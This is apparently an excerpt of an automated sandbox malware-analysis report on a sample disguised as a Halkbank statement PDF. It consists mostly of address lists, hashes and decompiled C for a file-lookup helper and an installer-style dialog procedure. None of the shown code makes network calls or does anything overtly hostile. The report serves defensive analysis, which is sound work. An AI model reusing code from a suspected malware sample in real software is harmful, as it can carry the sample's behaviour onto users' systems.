                                          0x00406ece
                                          0x00406ed0
                                          0x00406ed0
                                          0x00406ed3
                                          0x00406ed3
                                          0x00406f33
                                          0x00406f3a
                                          0x00406f3a
                                          0x00406f3a
                                          0x00406f3e
                                          0x00406f3e
                                          0x00406f41
                                          0x00406f44
                                          0x00406f48
                                          0x0040758d
                                          0x00000000
                                          0x0040758d
                                          0x00406f4e
                                          0x00406f51
                                          0x00406f54
                                          0x00406f57
                                          0x00406f5a
                                          0x00406f5d
                                          0x00406f60
                                          0x00406f62
                                          0x00406f65
                                          0x00406f68
                                          0x00406f6b
                                          0x00406f6d
                                          0x00406f6d
                                          0x00406f6d
                                          0x0040710a
                                          0x0040710a
                                          0x0040710d
                                          0x0040710d
                                          0x00000000
                                          0x0040710d
                                          0x00406e2f
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00406eac
                                          0x00406df8
                                          0x00406dfc
                                          0x00407569
                                          0x004075e5
                                          0x004075ed
                                          0x004075f4
                                          0x004075f6
                                          0x004075fd
                                          0x00407601
                                          0x00407601
                                          0x00406e02
                                          0x00406e05
                                          0x00406e08
                                          0x00406e0c
                                          0x00406e0f
                                          0x00406e15
                                          0x00406e17
                                          0x00406e17
                                          0x00406e1a
                                          0x00000000
                                          0x00406e1a
                                          0x00406ea6
                                          0x00406daf
                                          0x00406be3
                                          0x00406be3
                                          0x00406bec
                                          0x004075fa
                                          0x004075fa
                                          0x00000000
                                          0x004075fa
                                          0x00406bf2
                                          0x00000000
                                          0x00406bfd
                                          0x00000000
                                          0x00000000
                                          0x00406c06
                                          0x00406c09
                                          0x00406c0c
                                          0x00406c10
                                          0x00000000
                                          0x00000000
                                          0x00406c16
                                          0x00406c19
                                          0x00406c1b
                                          0x00406c1c
                                          0x00406c1f
                                          0x00406c21
                                          0x00406c22
                                          0x00406c24
                                          0x00406c27
                                          0x00406c2c
                                          0x00406c31
                                          0x00406c3a
                                          0x00406c4d
                                          0x00406c50
                                          0x00406c5c
                                          0x00406c84
                                          0x00406c86
                                          0x00406c94
                                          0x00406c94
                                          0x00406c98
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00406c88
                                          0x00406c88
                                          0x00406c8b
                                          0x00406c8c
                                          0x00406c8c
                                          0x00000000
                                          0x00406c88
                                          0x00406c62
                                          0x00406c67
                                          0x00406c67
                                          0x00406c70
                                          0x00406c78
                                          0x00406c7b
                                          0x00000000
                                          0x00406c81
                                          0x00406c81
                                          0x00000000
                                          0x00406c81
                                          0x00000000
                                          0x00406c9e
                                          0x00406c9e
                                          0x00406ca2
                                          0x0040754e
                                          0x00000000
                                          0x0040754e
                                          0x00406cab
                                          0x00406cbb
                                          0x00406cbe
                                          0x00406cc1
                                          0x00406cc1
                                          0x00406cc1
                                          0x00406cc4
                                          0x00406cc8
                                          0x00000000
                                          0x00000000
                                          0x00406cca
                                          0x00406cd0
                                          0x00406cfa
                                          0x00406d00
                                          0x00406d07
                                          0x00000000
                                          0x00406d07
                                          0x00406cd6
                                          0x00406cd9
                                          0x00406cde
                                          0x00406cde
                                          0x00406ce9
                                          0x00406cf1
                                          0x00406cf4
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00406d39
                                          0x00406d3f
                                          0x00406d42
                                          0x00406d4f
                                          0x00406d57
                                          0x00000000
                                          0x00000000
                                          0x00406d0e
                                          0x00406d0e
                                          0x00406d12
                                          0x0040755d
                                          0x00000000
                                          0x0040755d
                                          0x00406d1e
                                          0x00406d29
                                          0x00406d29
                                          0x00406d29
                                          0x00406d2c
                                          0x00406d2f
                                          0x00406d32
                                          0x00406d37
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00406ffe
                                          0x00407002
                                          0x00407020
                                          0x00407023
                                          0x0040702a
                                          0x0040702d
                                          0x00407030
                                          0x00407033
                                          0x00407036
                                          0x00407039
                                          0x0040703b
                                          0x00407042
                                          0x00407043
                                          0x00407045
                                          0x00407048
                                          0x0040704b
                                          0x0040704e
                                          0x0040704e
                                          0x00407053
                                          0x00000000
                                          0x00407053
                                          0x00407004
                                          0x00407007
                                          0x0040700a
                                          0x00407014
                                          0x00000000
                                          0x00000000
                                          0x00407068
                                          0x0040706c
                                          0x0040708f
                                          0x00407092
                                          0x00407095
                                          0x0040709f
                                          0x0040706e
                                          0x0040706e
                                          0x00407071
                                          0x00407074
                                          0x00407077
                                          0x00407084
                                          0x00407087
                                          0x00407087
                                          0x00000000
                                          0x00000000
                                          0x004070ab
                                          0x004070af
                                          0x00000000
                                          0x00000000
                                          0x004070b5
                                          0x004070b9
                                          0x00000000
                                          0x00000000
                                          0x004070bf
                                          0x004070c1
                                          0x004070c5
                                          0x004070c5
                                          0x004070c8
                                          0x004070cc
                                          0x00000000
                                          0x00000000
                                          0x0040711c
                                          0x00407120
                                          0x00407127
                                          0x0040712a
                                          0x0040712d
                                          0x00407137
                                          0x00000000
                                          0x00407137
                                          0x00407122
                                          0x00000000
                                          0x00000000
                                          0x00407143
                                          0x00407147
                                          0x0040714e
                                          0x00407151
                                          0x00407154
                                          0x00407149
                                          0x00407149
                                          0x00407149
                                          0x00407157
                                          0x0040715a
                                          0x0040715d
                                          0x0040715d
                                          0x00407160
                                          0x00407163
                                          0x00407166
                                          0x00407166
                                          0x00407169
                                          0x00407170
                                          0x00407175
                                          0x00000000
                                          0x00000000
                                          0x00407203
                                          0x00407203
                                          0x00407207
                                          0x004075a5
                                          0x00000000
                                          0x004075a5
                                          0x0040720d
                                          0x00407210
                                          0x00407213
                                          0x00407217
                                          0x0040721a
                                          0x00407220
                                          0x00407222
                                          0x00407222
                                          0x00407222
                                          0x00407225
                                          0x00407228
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00407286
                                          0x00407286
                                          0x0040728a
                                          0x004075b1
                                          0x00000000
                                          0x004075b1
                                          0x00407290
                                          0x00407293
                                          0x00407296
                                          0x0040729a
                                          0x0040729d
                                          0x004072a3
                                          0x004072a5
                                          0x004072a5
                                          0x004072a5
                                          0x004072a8
                                          0x00000000
                                          0x00000000
                                          0x00407056
                                          0x00407056
                                          0x00407059
                                          0x00000000
                                          0x00000000
                                          0x00407395
                                          0x00407399
                                          0x004073bb
                                          0x004073be
                                          0x004073c8
                                          0x00000000
                                          0x004073c8
                                          0x0040739b
                                          0x0040739e
                                          0x004073a2
                                          0x004073a5
                                          0x004073a5
                                          0x004073a8
                                          0x00000000
                                          0x00000000
                                          0x00407452
                                          0x00407456
                                          0x00407474
                                          0x00407474
                                          0x00407474
                                          0x0040747b
                                          0x00407482
                                          0x00407489
                                          0x00407489
                                          0x00000000
                                          0x00407489
                                          0x00407458
                                          0x0040745b
                                          0x0040745e
                                          0x00407461
                                          0x00407468
                                          0x004073ac
                                          0x004073ac
                                          0x004073af
                                          0x00000000
                                          0x00000000
                                          0x00407543
                                          0x00407546
                                          0x00000000
                                          0x00000000
                                          0x0040717d
                                          0x0040717f
                                          0x00407186
                                          0x00407187
                                          0x00407189
                                          0x0040718c
                                          0x00000000
                                          0x00000000
                                          0x00407194
                                          0x00407197
                                          0x0040719a
                                          0x0040719c
                                          0x0040719e
                                          0x0040719e
                                          0x0040719f
                                          0x004071a2
                                          0x004071a9
                                          0x004071ac
                                          0x004071ba
                                          0x00000000
                                          0x00000000
                                          0x00407490
                                          0x00407490
                                          0x00407493
                                          0x0040749a
                                          0x00000000
                                          0x00000000
                                          0x0040749f
                                          0x0040749f
                                          0x004074a3
                                          0x004075db
                                          0x00000000
                                          0x004075db
                                          0x004074a9
                                          0x004074ac
                                          0x004074af
                                          0x004074b3
                                          0x004074b6
                                          0x004074bc
                                          0x004074be
                                          0x004074be
                                          0x004074be
                                          0x004074c1
                                          0x004074c4
                                          0x004074c4
                                          0x004074c4
                                          0x004074c4
                                          0x004074c7
                                          0x004074c7
                                          0x004074cb
                                          0x0040752b
                                          0x0040752e
                                          0x00407533
                                          0x00407534
                                          0x00407536
                                          0x00407538
                                          0x0040753b
                                          0x00000000
                                          0x0040753b
                                          0x004074cd
                                          0x004074d3
                                          0x004074d6
                                          0x004074d9
                                          0x004074dc
                                          0x004074df
                                          0x004074e2
                                          0x004074e5
                                          0x004074e8
                                          0x004074eb
                                          0x004074ee
                                          0x00407507
                                          0x0040750a
                                          0x0040750d
                                          0x00407510
                                          0x00407514
                                          0x00407516
                                          0x00407516
                                          0x00407517
                                          0x0040751a
                                          0x004074f0
                                          0x004074f0
                                          0x004074f8
                                          0x004074fd
                                          0x004074ff
                                          0x00407502
                                          0x00407502
                                          0x0040751d
                                          0x00407524
                                          0x00000000
                                          0x00407526
                                          0x00000000
                                          0x00407526
                                          0x00000000
                                          0x004071c2
                                          0x004071c5
                                          0x004071fb
                                          0x0040732b
                                          0x0040732b
                                          0x0040732b
                                          0x0040732b
                                          0x0040732e
                                          0x0040732e
                                          0x00407331
                                          0x00407333
                                          0x004075bd
                                          0x00000000
                                          0x004075bd
                                          0x00407339
                                          0x0040733c
                                          0x00000000
                                          0x00000000
                                          0x00407342
                                          0x00407346
                                          0x00407349
                                          0x00407349
                                          0x00407349
                                          0x00000000
                                          0x00407349
                                          0x004071c7
                                          0x004071c9
                                          0x004071cb
                                          0x004071cd
                                          0x004071d0
                                          0x004071d1
                                          0x004071d3
                                          0x004071d5
                                          0x004071d8
                                          0x004071db
                                          0x004071f1
                                          0x004071f6
                                          0x0040722e
                                          0x0040722e
                                          0x00407232
                                          0x0040725e
                                          0x00407260
                                          0x00407267
                                          0x0040726a
                                          0x0040726d
                                          0x0040726d
                                          0x00407272
                                          0x00407272
                                          0x00407274
                                          0x00407277
                                          0x0040727e
                                          0x00407281
                                          0x004072ae
                                          0x004072ae
                                          0x004072b1
                                          0x004072b4
                                          0x00407328
                                          0x00407328
                                          0x00407328
                                          0x00000000
                                          0x00407328
                                          0x004072b6
                                          0x004072bc
                                          0x004072bf
                                          0x004072c2
                                          0x004072c5
                                          0x004072c8
                                          0x004072cb
                                          0x004072ce
                                          0x004072d1
                                          0x004072d4
                                          0x004072d7
                                          0x004072f0
                                          0x004072f2
                                          0x004072f5
                                          0x004072f6
                                          0x004072f9
                                          0x004072fb
                                          0x004072fe
                                          0x00407300
                                          0x00407302
                                          0x00407305
                                          0x00407307
                                          0x0040730a
                                          0x0040730e
                                          0x00407310
                                          0x00407310
                                          0x00407311
                                          0x00407314
                                          0x00407317
                                          0x004072d9
                                          0x004072d9
                                          0x004072e1
                                          0x004072e6
                                          0x004072e8
                                          0x004072eb
                                          0x004072eb
                                          0x0040731a
                                          0x00407321
                                          0x004072ab
                                          0x004072ab
                                          0x004072ab
                                          0x004072ab
                                          0x00000000
                                          0x00407323
                                          0x00000000
                                          0x00407323
                                          0x00407321
                                          0x00407234
                                          0x00407237
                                          0x00407239
                                          0x0040723c
                                          0x0040723f
                                          0x00407242
                                          0x00407244
                                          0x00407247
                                          0x0040724a
                                          0x0040724a
                                          0x0040724d
                                          0x0040724d
                                          0x00407250
                                          0x00407257
                                          0x0040722b
                                          0x0040722b
                                          0x0040722b
                                          0x0040722b
                                          0x00000000
                                          0x00407259
                                          0x00000000
                                          0x00407259
                                          0x00407257
                                          0x004071dd
                                          0x004071e0
                                          0x004071e2
                                          0x004071e5
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004070cf
                                          0x004070cf
                                          0x004070d3
                                          0x00407599
                                          0x00000000
                                          0x00407599
                                          0x004070d9
                                          0x004070dc
                                          0x004070df
                                          0x004070e2
                                          0x004070e4
                                          0x004070e4
                                          0x004070e4
                                          0x004070e7
                                          0x004070ea
                                          0x004070ed
                                          0x004070f0
                                          0x004070f3
                                          0x004070f6
                                          0x004070f7
                                          0x004070f9
                                          0x004070f9
                                          0x004070f9
                                          0x004070fc
                                          0x004070ff
                                          0x00407102
                                          0x00407105
                                          0x00407105
                                          0x00407105
                                          0x00407108
                                          0x00000000
                                          0x00000000
                                          0x0040734c
                                          0x0040734c
                                          0x0040734c
                                          0x00407350
                                          0x00000000
                                          0x00000000
                                          0x00407356
                                          0x00407359
                                          0x0040735c
                                          0x0040735f
                                          0x00407361
                                          0x00407361
                                          0x00407361
                                          0x00407364
                                          0x00407367
                                          0x0040736a
                                          0x0040736d
                                          0x00407370
                                          0x00407373
                                          0x00407374
                                          0x00407376
                                          0x00407376
                                          0x00407376
                                          0x00407379
                                          0x0040737c
                                          0x0040737f
                                          0x00407382
                                          0x00407385
                                          0x00407389
                                          0x0040738b
                                          0x0040738e
                                          0x00000000
                                          0x00407390
                                          0x00000000
                                          0x00407390
                                          0x0040738e
                                          0x004075c3
                                          0x00000000
                                          0x00000000
                                          0x00406bf2

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.259056765.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.259049654.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259066123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259109034.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                                          • Instruction ID: 02c1e40b0c9780dd067322b7733c474732bd0f187a49f53fd7fd3c108ee94619
                                          • Opcode Fuzzy Hash: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                                          • Instruction Fuzzy Hash: 7CF15570D04229CBDF28CFA8C8946ADBBB0FF44305F24816ED456BB281D7386A86DF45
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040699E Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0040699E(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x426798); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x426798;
			}




                                          0x004069a9
                                          0x004069b2
                                          0x00000000
                                          0x004069bf
                                          0x004069b5
                                          0x00000000

                                          APIs
                                          • FindFirstFileW.KERNELBASE(74D0FAA0,00426798,00425F50,00406088,00425F50,00425F50,00000000,00425F50,00425F50,74D0FAA0,?,74D0F560,00405D94,?,74D0FAA0,74D0F560), ref: 004069A9
                                          • FindClose.KERNEL32(00000000), ref: 004069B5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.259056765.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.259049654.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259066123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259109034.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                          Similarity
                                          • API ID: Find$CloseFileFirst
                                          • String ID:
                                          • API String ID: 2295610775-0
                                          • Opcode ID: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                          • Instruction ID: 0ca7534fdffec89160a31ceabb6ef5ff718bfc83d1618d69d17f9e635378cbc3
                                          • Opcode Fuzzy Hash: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                          • Instruction Fuzzy Hash: 5ED012B15192205FC34057387E0C84B7A989F563317268A36B4AAF11E0CB348C3297AC
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004040C5 Relevance: 61.6, APIs: 34, Strings: 1, Instructions: 357windowstringCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 141 4040c5-4040d7 142 4040dd-4040e3 141->142 143 40423e-40424d 141->143 142->143 144 4040e9-4040f2 142->144 145 40429c-4042b1 143->145 146 40424f-40428a GetDlgItem * 2 call 4045c4 KiUserCallbackDispatcher call 40140b 143->146 149 4040f4-404101 SetWindowPos 144->149 150 404107-40410e 144->150 147 4042f1-4042f6 call 404610 145->147 148 4042b3-4042b6 145->148 167 40428f-404297 146->167 163 4042fb-404316 147->163 152 4042b8-4042c3 call 401389 148->152 153 4042e9-4042eb 148->153 149->150 155 404110-40412a ShowWindow 150->155 156 404152-404158 150->156 152->153 177 4042c5-4042e4 SendMessageW 152->177 153->147 162 404591 153->162 164 404130-404143 GetWindowLongW 155->164 165 40422b-404239 call 40462b 155->165 158 404171-404174 156->158 159 40415a-40416c DestroyWindow 156->159 169 404176-404182 SetWindowLongW 158->169 170 404187-40418d 158->170 166 40456e-404574 159->166 168 404593-40459a 162->168 173 404318-40431a call 40140b 163->173 174 40431f-404325 163->174 164->165 175 404149-40414c ShowWindow 164->175 165->168 166->162 180 404576-40457c 166->180 167->145 169->168 170->165 176 404193-4041a2 GetDlgItem 170->176 173->174 181 40432b-404336 174->181 182 40454f-404568 DestroyWindow EndDialog 174->182 175->156 184 4041c1-4041c4 176->184 185 4041a4-4041bb SendMessageW IsWindowEnabled 176->185 177->168 180->162 186 40457e-404587 ShowWindow 180->186 181->182 183 40433c-404389 call 4066a5 call 4045c4 * 3 GetDlgItem 181->183 182->166 213 404393-4043cf ShowWindow EnableWindow call 4045e6 EnableWindow 183->213 214 40438b-404390 183->214 188 4041c6-4041c7 184->188 189 4041c9-4041cc 184->189 185->162 185->184 186->162 191 4041f7-4041fc call 40459d 188->191 192 4041da-4041df 189->192 193 4041ce-4041d4 189->193 191->165 196 404215-404225 SendMessageW 192->196 198 4041e1-4041e7 192->198 193->196 197 4041d6-4041d8 193->197 196->165 197->191 201 4041e9-4041ef call 40140b 198->201 202 4041fe-404207 call 40140b 198->202 209 4041f5 201->209 202->165 211 404209-404213 202->211 209->191 211->209 217 4043d1-4043d2 213->217 218 4043d4 213->218 214->213 219 4043d6-404404 GetSystemMenu EnableMenuItem SendMessageW 217->219 218->219 220 404406-404417 SendMessageW 219->220 221 404419 219->221 222 40441f-40445e call 4045f9 call 4040a6 call 406668 lstrlenW call 4066a5 SetWindowTextW call 401389 220->222 221->222 222->163 233 404464-404466 222->233 233->163 234 40446c-404470 233->234 235 404472-404478 234->235 236 40448f-4044a3 DestroyWindow 234->236 235->162 237 40447e-404484 235->237 236->166 238 4044a9-4044d6 CreateDialogParamW 236->238 237->163 239 40448a 237->239 238->166 240 4044dc-404533 call 4045c4 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 238->240 239->162 240->162 245 404535-40454d ShowWindow call 404610 240->245 245->166
                                          C-Code - Quality: 84%
                                          			E004040C5(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
				struct HWND__* _v28;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				signed int _t36;
				signed int _t38;
				struct HWND__* _t48;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t117;
				int _t118;
				int _t122;
				signed int _t124;
				struct HWND__* _t127;
				struct HWND__* _t128;
				int _t129;
				intOrPtr _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;
				void* _t145;

				_t130 = _a8;
				if(_t130 == 0x110 || _t130 == 0x408) {
					_t34 = _a12;
					_t127 = _a4;
					__eflags = _t130 - 0x110;
					 *0x423730 = _t34;
					if(_t130 == 0x110) {
						 *0x42a268 = _t127;
						 *0x423744 = GetDlgItem(_t127, 1);
						_t91 = GetDlgItem(_t127, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x421710 = _t91;
						E004045C4(_t127);
						SetClassLongW(_t127, 0xfffffff2,  *0x429248); // executed
						 *0x42922c = E0040140B(4);
						_t34 = 1;
						__eflags = 1;
						 *0x423730 = 1;
					}
					_t124 =  *0x40a39c; // 0x0
					_t136 = 0;
					_t133 = (_t124 << 6) +  *0x42a280;
					__eflags = _t124;
					if(_t124 < 0) {
						L36:
						E00404610(0x40b);
						while(1) {
							_t36 =  *0x423730;
							 *0x40a39c =  *0x40a39c + _t36;
							_t133 = _t133 + (_t36 << 6);
							_t38 =  *0x40a39c; // 0x0
							__eflags = _t38 -  *0x42a284;
							if(_t38 ==  *0x42a284) {
								E0040140B(1);
							}
							__eflags =  *0x42922c - _t136;
							if( *0x42922c != _t136) {
								break;
							}
							__eflags =  *0x40a39c -  *0x42a284; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t133 + 0x14);
							E004066A5(_t117, _t127, _t133, 0x43a000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E004045C4(_t127);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E004045C4(_t127);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E004045C4(_t127);
							_t48 = GetDlgItem(_t127, 3);
							__eflags =  *0x42a2ec - _t136;
							_v28 = _t48;
							if( *0x42a2ec != _t136) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t48, _t117 & 0x00000008);
							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100);
							E004045E6(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x421710, _t118);
							__eflags = _t118 - _t136;
							if(_t118 == _t136) {
								_push(1);
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
							__eflags =  *0x42a2ec - _t136;
							if( *0x42a2ec == _t136) {
								_push( *0x423744);
							} else {
								SendMessageW(_t127, 0x401, 2, _t136);
								_push( *0x421710);
							}
							E004045F9();
							E00406668(0x423748, E004040A6());
							E004066A5(0x423748, _t127, _t133,  &(0x423748[lstrlenW(0x423748)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t127, 0x423748);
							_push(_t136);
							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x429238);
									 *0x422720 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L60;
									}
									_t73 = CreateDialogParamW( *0x42a260,  *_t133 +  *0x429240 & 0x0000ffff, _t127,  *(0x40a3a0 +  *(_t133 + 4) * 4), _t133);
									__eflags = _t73 - _t136;
									 *0x429238 = _t73;
									if(_t73 == _t136) {
										goto L60;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E004045C4(_t73);
									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t127, _t137 + 0x10);
									SetWindowPos( *0x429238, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									_push(_t136);
									E00401389( *((intOrPtr*)(_t133 + 0xc)));
									__eflags =  *0x42922c - _t136;
									if( *0x42922c != _t136) {
										goto L63;
									}
									ShowWindow( *0x429238, 8);
									E00404610(0x405);
									goto L60;
								}
								__eflags =  *0x42a2ec - _t136;
								if( *0x42a2ec != _t136) {
									goto L63;
								}
								__eflags =  *0x42a2e0 - _t136;
								if( *0x42a2e0 != _t136) {
									continue;
								}
								goto L63;
							}
						}
						DestroyWindow( *0x429238); // executed
						 *0x42a268 = _t136;
						EndDialog(_t127,  *0x421f18);
						goto L60;
					} else {
						__eflags = _t34 - 1;
						if(_t34 != 1) {
							L35:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L63;
							}
							goto L36;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L35;
						}
						SendMessageW( *0x429238, 0x40f, 0, 1);
						__eflags =  *0x42922c;
						return 0 |  *0x42922c == 0x00000000;
					}
				} else {
					_t127 = _a4;
					_t136 = 0;
					if(_t130 == 0x47) {
						SetWindowPos( *0x423728, _t127, 0, 0, 0, 0, 0x13);
					}
					_t122 = _a12;
					if(_t130 != 5) {
						L8:
						if(_t130 != 0x40d) {
							__eflags = _t130 - 0x11;
							if(_t130 != 0x11) {
								__eflags = _t130 - 0x111;
								if(_t130 != 0x111) {
									goto L28;
								}
								_t135 = _t122 & 0x0000ffff;
								_t128 = GetDlgItem(_t127, _t135);
								__eflags = _t128 - _t136;
								if(_t128 == _t136) {
									L15:
									__eflags = _t135 - 1;
									if(_t135 != 1) {
										__eflags = _t135 - 3;
										if(_t135 != 3) {
											_t129 = 2;
											__eflags = _t135 - _t129;
											if(_t135 != _t129) {
												L27:
												SendMessageW( *0x429238, 0x111, _t122, _a16);
												goto L28;
											}
											__eflags =  *0x42a2ec - _t136;
											if( *0x42a2ec == _t136) {
												_t99 = E0040140B(3);
												__eflags = _t99;
												if(_t99 != 0) {
													goto L28;
												}
												 *0x421f18 = 1;
												L23:
												_push(0x78);
												L24:
												E0040459D();
												goto L28;
											}
											E0040140B(_t129);
											 *0x421f18 = _t129;
											goto L23;
										}
										__eflags =  *0x40a39c - _t136; // 0x0
										if(__eflags <= 0) {
											goto L27;
										}
										_push(0xffffffff);
										goto L24;
									}
									_push(_t135);
									goto L24;
								}
								SendMessageW(_t128, 0xf3, _t136, _t136);
								_t103 = IsWindowEnabled(_t128);
								__eflags = _t103;
								if(_t103 == 0) {
									L63:
									return 0;
								}
								goto L15;
							}
							SetWindowLongW(_t127, _t136, _t136);
							return 1;
						}
						DestroyWindow( *0x429238);
						 *0x429238 = _t122;
						L60:
						_t145 =  *0x425748 - _t136; // 0x0
						if(_t145 == 0 &&  *0x429238 != _t136) {
							ShowWindow(_t127, 0xa);
							 *0x425748 = 1;
						}
						goto L63;
					} else {
						asm("sbb eax, eax");
						ShowWindow( *0x423728,  ~(_t122 - 1) & 0x00000005);
						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
							L28:
							return E0040462B(_a8, _t122, _a16);
						} else {
							ShowWindow(_t127, 4);
							goto L8;
						}
					}
				}
			}
































                                          0x004040d0
                                          0x004040d7
                                          0x0040423e
                                          0x00404242
                                          0x00404246
                                          0x00404248
                                          0x0040424d
                                          0x00404258
                                          0x00404263
                                          0x00404268
                                          0x0040426a
                                          0x0040426c
                                          0x0040426f
                                          0x00404274
                                          0x00404282
                                          0x0040428f
                                          0x00404296
                                          0x00404296
                                          0x00404297
                                          0x00404297
                                          0x0040429c
                                          0x004042a2
                                          0x004042a9
                                          0x004042af
                                          0x004042b1
                                          0x004042f1
                                          0x004042f6
                                          0x004042fb
                                          0x004042fb
                                          0x00404300
                                          0x00404309
                                          0x0040430b
                                          0x00404310
                                          0x00404316
                                          0x0040431a
                                          0x0040431a
                                          0x0040431f
                                          0x00404325
                                          0x00000000
                                          0x00000000
                                          0x00404330
                                          0x00404336
                                          0x00000000
                                          0x00000000
                                          0x0040433f
                                          0x00404347
                                          0x0040434c
                                          0x0040434f
                                          0x00404355
                                          0x0040435a
                                          0x0040435d
                                          0x00404363
                                          0x00404368
                                          0x0040436b
                                          0x00404371
                                          0x00404379
                                          0x0040437f
                                          0x00404385
                                          0x00404389
                                          0x00404390
                                          0x00404390
                                          0x00404390
                                          0x0040439a
                                          0x004043ac
                                          0x004043b8
                                          0x004043bd
                                          0x004043c7
                                          0x004043cd
                                          0x004043cf
                                          0x004043d4
                                          0x004043d1
                                          0x004043d1
                                          0x004043d1
                                          0x004043e4
                                          0x004043fc
                                          0x004043fe
                                          0x00404404
                                          0x00404419
                                          0x00404406
                                          0x0040440f
                                          0x00404411
                                          0x00404411
                                          0x0040441f
                                          0x00404430
                                          0x00404446
                                          0x0040444d
                                          0x00404453
                                          0x00404457
                                          0x0040445c
                                          0x0040445e
                                          0x00000000
